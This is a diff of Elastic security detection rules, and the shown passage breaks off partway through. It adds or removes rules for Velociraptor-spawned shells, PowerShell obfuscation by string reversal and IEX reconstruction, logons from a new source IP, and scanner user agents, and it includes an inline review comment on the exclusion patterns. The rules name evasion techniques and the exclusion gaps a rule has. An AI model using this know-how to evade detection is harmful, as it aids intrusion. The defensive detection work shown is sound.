@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects shell executions (cmd, PowerShell, rundll32) spawned by Velociraptor. Threat actors have been observed installing Velociraptor to execute shell commands on compromised systems, blending in with legitimate system processes.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Shell Execution via Velociraptor", + "note": "## Triage and analysis\n\n### Investigating Suspicious Shell Execution via Velociraptor\n\nVelociraptor is a legitimate endpoint visibility and response tool. Threat actors have been observed deploying it on compromised systems to run shell commands (cmd, PowerShell, rundll32), making their activity look like normal Velociraptor-collector behavior.\n\n### Possible investigation steps\n\n- Confirm the parent process name matches a Velociraptor binary (e.g. velociraptor.exe, Velociraptor.exe) and the child is cmd.exe, powershell.exe, or rundll32.exe.\n- Review the child process command line for suspicious or interactive commands (e.g. download, lateral movement, credential access) versus known Velociraptor artifact scripts (Get-LocalGroupMember, Get-Date, registry queries, Velociraptor Tools module).\n- Identify how Velociraptor was installed (dropped by another process, scheduled task, service); correlate with earlier process or file events on the host.\n- Check whether the Velociraptor executable path and code signature are expected (e.g. Program Files vs. temp or user writable); unauthorized installs are often from non-standard paths.\n- Correlate with other alerts for the same host or user (initial access, persistence, C2) to determine if this is abuse vs. 
legitimate IR/DFIR use.\n\n### False positive analysis\n\n- Legitimate Velociraptor artifacts that run Get-LocalGroupMember, Get-Date, registry Run key checks, or Velociraptor Tools PowerShell module are excluded by the rule; remaining FPs may be custom artifacts. Allowlist by command-line pattern or host if you use Velociraptor for authorized IR and see known-good artifacts.\n\n### Response and remediation\n\n- If abuse is confirmed: isolate the host, terminate the Velociraptor and child shell processes, and remove the Velociraptor installation (binary, service, config).\n- Determine how Velociraptor was deployed and close the initial access vector; rotate credentials for affected accounts.\n- If the deployment was authorized (IR/DFIR), document and tune the rule or add an exception to reduce noise.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.command_line != null and\n process.parent.name : \"velociraptor.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"rundll32.exe\") and\n not (process.name : \"powershell.exe\" and process.command_line : \"*RwBlAHQALQBMAG8AYwBhAGwARwByAG8AdQBwAE0AZQBtAGIAZQBy*\") and\n not (process.name : \"powershell.exe\" and process.command_line : \"*RwBlAHQALQBEAGEAdABl*\" and process.command_line : \"*-Format*\") and\n not (process.name : \"cmd.exe\" and process.command_line : \"*start*127.0.0.1:8889*\") and\n not (process.name : \"powershell.exe\" and process.command_line : \"*RwBlAHQALQBJAHQAZQBt*\" and process.command_line : \"*UgBlAGcAaQBzAHQAcgB5*\" and process.command_line : \"*UgB1AG4A*\") and\n not (process.name : \"powershell.exe\" and\n process.args : (\"RwBlAHQALQ*\", \"UgBlAG0AbwB2AGUALQBJAHQAZQBtACA*\", \"C:\\\\Program Files\\\\Velociraptor\\\\thor.db\",\n \"import-module \\\"C:\\\\Program Files\\\\Velociraptor\\\\Tools\\\\*\"))\n", + "references": [ + "https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399", + 
"https://attack.mitre.org/techniques/T1219/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9aeca498-1e3d-4496-9e12-6ef40047eb23", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + 
"version": 1 + }, + "id": "9aeca498-1e3d-4496-9e12-6ef40047eb23_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_6.json b/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_6.json deleted file mode 100644 index f2ca4cf8517..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_6.json +++ /dev/null 
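Review bot: The last exclusion in `query` is broader than the false positive section describes: `process.args : ("RwBlAHQALQ*", "UgBlAG0AbwB2AGUALQBJAHQAZQBtACA*", ...)` suppresses any encoded PowerShell argument that merely starts with those prefixes (the first decodes from UTF-16LE base64 to `Get-`, the second to `Remove-Item `), so the allow-list is anchored on the opening cmdlet rather than on a specific artifact, while the note tells analysts only Get-LocalGroupMember, Get-Date, registry Run key checks and the Tools module are excluded. Consider tightening the prefix-only patterns to the full artifact strings, as the three earlier `process.command_line` exclusions already do, and list every exclusion (including the `thor.db` path) in the false positive analysis so a tuning reviewer sees the real coverage gap. Separately, `tags` carry `Tactic: Execution` and `Tactic: Defense Evasion` but `threat` maps only TA0011/T1219.002; the two arrays should agree, and T1219.002 "Remote Desktop Software" seems a questionable fit for an IR agent — mapping the parent technique T1219 alone may be more defensible.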
@@ -1,178 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use negative index ranges to reverse the contents of a string or array at runtime as a form of obfuscation. This technique avoids direct use of reversal functions by iterating through array elements in reverse order. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "PowerShell Obfuscation via Negative Index String Reversal", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating PowerShell Obfuscation via Negative Index String Reversal\n\nPowerShell, a powerful scripting language, can be exploited by adversaries using obfuscation techniques like negative index string reversal to evade detection. This method manipulates strings or arrays by iterating in reverse, bypassing static analysis tools. 
The detection rule identifies scripts with obfuscation patterns by analyzing script length and specific indexing patterns, flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` to understand the script's intent and identify any suspicious or malicious behavior.\n- Check the `host.name` and `user.id` fields to determine the affected system and user, assessing if they are high-value targets or have a history of similar alerts.\n- Analyze the `file.path` to identify the location of the script and assess if it is in a common or suspicious directory.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` to trace the execution flow and determine if this script is part of a larger, potentially malicious sequence.\n- Correlate the `agent.id` with other logs to see if there are additional related activities or alerts from the same endpoint.\n- Examine the `count` of detected patterns to assess the level of obfuscation and potential threat severity.\n\n### False positive analysis\n\n- Scripts containing the keyword \"GENESIS-5654\" are known false positives and are automatically excluded from triggering alerts. Ensure that any legitimate scripts using this keyword are documented to prevent unnecessary investigations.\n- Legitimate administrative scripts that use negative indexing for valid purposes may trigger false positives. 
Review these scripts and consider adding them to an exception list if they are frequently flagged but verified as non-malicious.\n- Automated scripts generated by trusted software that use similar obfuscation patterns for performance or compatibility reasons can be excluded by identifying unique identifiers or patterns within these scripts and updating the exclusion criteria accordingly.\n- Regularly update the exclusion list to include new patterns or identifiers from trusted sources as they are identified, ensuring that legitimate activities are not hindered by the detection rule.\n- Collaborate with IT and security teams to maintain a list of known safe scripts and their characteristics, which can be referenced when analyzing potential false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts or unauthorized access.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing obfuscation activities.\n- Conduct a thorough review of the PowerShell script block text and related logs to identify any malicious payloads or commands executed.\n- Remove any identified malicious scripts or files from the affected system to prevent re-execution.\n- Reset credentials for any user accounts involved in the alert to mitigate potential unauthorized access.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems are compromised.\n- Update endpoint protection and monitoring tools to enhance detection capabilities for similar obfuscation techniques in the future.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where 
Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"\\$\\w+\\[\\-\\s?1\\.\\.\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n\n// FP Patterns\n| where not powershell.file.script_block_text like \"*GENESIS-5654*\"\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - 
"type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "9edd1804-83c7-4e48-b97d-c776b4c97564", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - 
"reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "9edd1804-83c7-4e48-b97d-c776b4c97564_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_8.json b/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_8.json deleted file mode 100644 index e701ecd1ff8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_8.json +++ /dev/null 
@@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command by accessing and indexing the string representation of method references. This obfuscation technique uses constructs like ''.IndexOf.ToString() to expose method metadata as a string, then extracts specific characters through indexed access and joins them to form IEX, bypassing static keyword detection and evading defenses such as AMSI.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Dynamic IEX Reconstruction via Method String Access", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Dynamic IEX Reconstruction via Method String Access\n\nPowerShell's flexibility allows dynamic command execution, which adversaries exploit by obfuscating commands like Invoke-Expression (IEX). They manipulate method strings to reconstruct IEX, evading static detection. The detection rule identifies scripts using this obfuscation by analyzing patterns in method string access, flagging suspicious activity for further investigation.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script that triggered the alert. 
Look for any suspicious patterns or obfuscation techniques.\n- Examine the file.path field to determine the location of the script on the host system, which can provide context about its origin and potential legitimacy.\n- Check the host.name and user.id fields to identify the machine and user account involved in executing the script, which can help assess whether the activity aligns with expected behavior.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other PowerShell activities on the host, providing a broader view of the script's execution context.\n- Investigate the agent.id field to verify the endpoint's security posture and ensure that it is up-to-date with the latest security patches and configurations.\n\n### False positive analysis\n\n- Scripts with legitimate use of string manipulation methods like IndexOf or SubString may trigger false positives if they are part of complex PowerShell scripts used in administrative tasks. To manage this, review the context of the script and consider adding exceptions for known safe scripts or users.\n- Automated scripts from trusted software that perform extensive string operations for configuration or data processing might be flagged. Identify these scripts and exclude them by their script block ID or file path to prevent unnecessary alerts.\n- Development environments where PowerShell is used for testing or debugging purposes may generate alerts due to frequent use of string manipulation. Implement exclusions based on host names or user IDs associated with these environments to reduce noise.\n- Security tools or monitoring solutions that use PowerShell for log analysis or system checks might inadvertently match the detection pattern. 
Verify the source of the script and whitelist these tools by agent ID or specific script characteristics.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and does not inadvertently allow malicious activity.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Review the PowerShell script block text and script block ID from the alert to understand the scope and intent of the obfuscation technique used.\n- Remove any unauthorized or malicious scripts from the affected system to prevent re-execution.\n- Conduct a thorough scan of the isolated host using updated antivirus and anti-malware tools to identify and remove any additional threats.\n- Restore the affected system from a known good backup if the integrity of the system is compromised and cannot be assured.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n 
\"\"\"(?i)['\"]['\"].(Insert|Normalize|Chars|substring|Remove|LastIndexOfAny|LastIndexOf|IsNormalized|IndexOfAny|IndexOf)[^\\[]+\\[\\d+,\\d+,\\d+\\]\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n\n| where not (\n file.directory like \"C:\\\\\\\\Program Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Maester\\\\\\\\1.1.0*\" or\n file.directory like \"C:\\\\\\\\Users\\\\\\\\*\\\\\\\\Documents\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Maester\\\\\\\\1.1.0*\"\n )\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { 
- "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "9f432a8b-9588-4550-838e-1f77285580d3", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - 
"id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 8 - }, - "id": "9f432a8b-9588-4550-838e-1f77285580d3_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2.json b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2.json new file mode 100644 index 00000000000..c021f8935a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location.", + "from": "now-15m", + "interval": "14m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential Account Takeover - Logon from New Source IP", + "note": "## Triage and analysis\n\n### Investigating Potential Account Takeover - Logon from New Source IP\n\nAn account that historically logs in many times from a single source IP (e.g. usual workstation or VPN) and then shows successful logons from exactly one other IP with a low count may indicate credential compromise and use from a new location (account takeover).\n\n### Possible investigation steps\n\n- Confirm with the account owner whether they recently logged in from the new source IP or from a new device/location.\n- Check the new source IP for reputation, geography, and whether it is expected (e.g. corporate VPN range vs unknown).\n- Correlate with other alerts for the same user or source IP (e.g. logon failures, password changes, MFA changes).\n- Review timeline: if the \"new\" IP logon is very recent compared to the high-count IP, treat as higher priority.\n\n### False positive analysis\n\n- Legitimate use from a second device (e.g. new laptop, second office, VPN from travel) can produce exactly two IPs with one IP having few logons. Tune threshold (e.g. max_logon >= 100) or add exclusions for known VPN/remote ranges if needed.\n- Service or shared accounts that are used from multiple jump hosts or scripts may show two IPs; consider excluding known service accounts.\n\n### Response and remediation\n\n- If takeover is confirmed: force password reset, revoke sessions, and enable or enforce MFA. 
Disable or lock the account until the user verifies identity.\n- Investigate how credentials may have been compromised (phishing, breach, endpoint) and address the vector.\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where event.category == \"authentication\" and event.action == \"logged-in\" and winlog.event_id == \"4624\" and \n event.outcome == \"success\" and winlog.logon.type in (\"Network\", \"RemoteInteractive\") and \n\t\tsource.ip is not null and source.ip != \"127.0.0.1\" and not to_string(source.ip) like \"*::*\" and not user.name like \"*$\"\n| stats logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, source.ip\n| stats \n Esql.max_logon = MAX(logon_count),\n Esql.min_logon = MIN(logon_count),\n Esql.unique_host_count = COUNT_DISTINCT(host_names),\n Esql.host_name_values = VALUES(host_names),\n Esql.source_ip_values = VALUES(source.ip),\n Esql.count_distinct_source_ip = COUNT_DISTINCT(source.ip) by user.name, user.id\n\n// high count of logons is often associated with service account tied to a specific source.ip, if observed in use from a new source.ip it's suspicious\n| where Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and Esql.min_logon <= 5) and Esql.count_distinct_source_ip == 2 and Esql.unique_host_count >= 2\n| eval source.ip = MV_FIRST(Esql.source_ip_values), host.name = MV_FIRST(Esql.host_name_values)\n| KEEP user.name, user.id, host.name, source.ip, Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1078/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_source_ip", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.max_logon", + "type": "long" + }, + { + "ecs": false, + 
"name": "Esql.min_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.unique_host_count", + "type": "long" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3.json b/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3.json new file mode 100644 index 00000000000..1adf059a590 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_3.json 
@@ -0,0 +1,158 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects unusual spikes in web server requests with uncommon or suspicious user-agent strings. Such activity may indicate reconnaissance attempts by attackers trying to identify vulnerabilities in web applications or servers. These user-agents are often associated with automated tools used for scanning, vulnerability assessment, or brute-force attacks.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Suspicious User Agent Requests", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Suspicious User Agent Requests\n\nThis rule flags surges of web requests that advertise scanner or brute-force tool user agents, signaling active reconnaissance against your web servers and applications. 
A common pattern is dirsearch or gobuster sweeping for hidden paths, firing hundreds of rapid GETs across diverse URLs from one host and probing admin panels, backup folders, and robots.txt.\n\n### Possible investigation steps\n\n- Verify whether the activity aligns with approved scanners or uptime checks by cross-referencing inventories, allowlists, change windows, and egress ranges; otherwise enrich the originating IP with ASN, geolocation, and threat reputation to gauge risk.\n- Sample representative requests to identify targeted paths and payloads (e.g., admin panels, .git/.env, backups, traversal, SQLi/XSS markers) and note any successful responses or downloads that indicate information exposure.\n- Analyze request rate, methods, and status-code distribution to separate noisy recon from successful discovery or brute-force patterns, highlighting any POST/PUT with nontrivial bodies.\n- Correlate the same client across hosts and security layers (application/auth logs, WAF/CDN, IDS) to determine whether it is scanning multiple services, triggering signatures, or attempting credential stuffing.\n- Assess user-agent authenticity and evasiveness by comparing HTTP header order/values and TLS fingerprints (JA3/JA4) to expected clients, and verify true client identity via forwarded-for headers if behind a proxy or CDN.\n\n### False positive analysis\n\n- Legitimate, scheduled vulnerability assessments by internal teams (e.g., Nessus, Nikto, or OpenVAS) can generate large volumes of requests with those user-agent strings across many paths.\n- Developer or QA testing using discovery/fuzzing or intercept-proxy tools (Dirsearch, Gobuster, Ffuf, Burp, or OWASP ZAP) may unintentionally target production hosts, producing a short-lived spike with diverse URLs.\n\n### Response and remediation\n\n- Immediately contain by blocking or rate-limiting the originating IPs at the WAF/CDN and edge firewall, and add temporary rules to drop or challenge requests that advertise tool user 
